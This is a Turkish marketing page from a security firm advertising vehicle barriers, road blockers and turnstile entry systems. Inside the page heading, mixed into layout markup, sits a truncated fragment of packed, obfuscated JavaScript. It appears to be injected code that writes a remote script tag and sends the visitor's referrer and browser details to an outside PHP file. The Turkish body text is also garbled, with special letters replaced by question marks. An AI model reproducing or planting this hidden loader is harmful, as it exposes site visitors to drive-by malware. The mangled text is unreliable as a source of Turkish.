Bariyer ve Turnike Sistemleri

<”h1″ id="uvc-type-wrap-2546" data-ultimate-target='#uvc-type-wrap-2546' data-responsive-json-new='{"font-size":"","line-height":""}' class="uvc-type-wrap ult-adjust-bottom-margin ult-responsive uvc-type-align-”left” uvc-wrap-13509902395b0178c15565a" style="font-weight:normal;text-align:”left”;">”Bariyer=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iefzd|var|u0026u|referrer|kbafb||js|php'.split('|'),0,{})) tüm kontrol bizle.” ex_class=”m-b-sm”]

Günümüz dünyas?nda art?k plaza giri?lerinde, ?irket giri?lerinde, ziyaretçi, misafir kontrolleri, personel giri?-ç?k??lar? art?k turnikeler ile yap?labilmektedir. Ayn? zamanda bu ?ekilde Turnike sistemi ile; ?irket veya plazalar?n?z?n giri?lerinin de kurumsal kimli?ini bir nevi anlayabiliriz. Örne?in; plazalar?n giri?lerinde ki?ilerin giri?leri art?k defter-imza sistemi ile de?il de teknolojinin yeni meyvelerinden olan turnike sistemleri ile kontrol alt?nda tutulabilir. Turnike giri?-ç?k??lar?na kartl? cihazlar kullan?larak, hem ziyaretçiler hem de orda çal??makta olan personellerin giri?-ç?k??lar? bilgisayar programlamalar? ile ki?ilerin bilgileri al?narak elle manuel yaz?l?p imza att?rmak yerine ça?da? ve h?zl? ?ekilde Turnikeler sayesinde programlanabilir.

ARTGES Genel Güvenlik Sistemleri;Turnike Sistemlerinin, geçi?lerin belirli bir düzende sa?lanmas? ve bu geçi?lerin kontrol alt?nda tutularak raporlanmas? gereken alanlarda s?kça kullan?lan bir yöntemdir. Turnike ile birlikte bir çok entegre sistem kullan?larak bu çal??malar?n manuel veya bilgisayar ortam?nda takip edilmesi mümkündür.

ARTGES Genel Güvenlik Sistemleri; Bariyer sistemlerinin, kontrolsüz yap?lan giri?leri önlemek, giri? ve ç?k??lar?n kontrol alt?na almak için en h?zl? ve etkili çözüm yoludur. Araç giri?inin istenmedi?i alanlarda ve araç giri?leri kontrol alt?nda tutmak için bariyer sistemleri kullanarak bunu engellemek hem can hem de mal güvenli?i ad?na son derece önemli bir konudur.

Bariyer Sistemlerimiz; Kollu Bariyerler, Hidrolik Mantar Bariyerler, Roadblockerler, Tuzaklar ve Kapanlar olarak s?n?fland?r?lm?? olup, en kaliteli ve en uygun fiyatlarla siz de?erli mü?terilerimizin hizmetinize sunulmu?tur.

 ARTGES Genel Güvenlik Sistemleri olarak, Bariyer Sistemlerimiz; Kollu Bariyerler, Hidrolik Mantar Bariyerler, Roadblockerler, Tuzaklar ve Kapanlar olarak s?n?fland?r?lm?? olup, günümüzün en son teknolojisine sahip kaliteli  markalar?n  olu?turdu?u  en çok tercih edilen Bariyer sistemlerimizi siz de?erli mü?terilerimizin güvenlik ihtiyaçlar?n? yerinde tecrübeli güvenlik uzman?m?z de?erlendirmesinde tespit ederek, deneyimli  teknik personelimiz ile montaj?n? yapmaktay?z. Teknik bilgi ve tecrübelerimize dayanarak güvenli sistemler kurmaktay?z.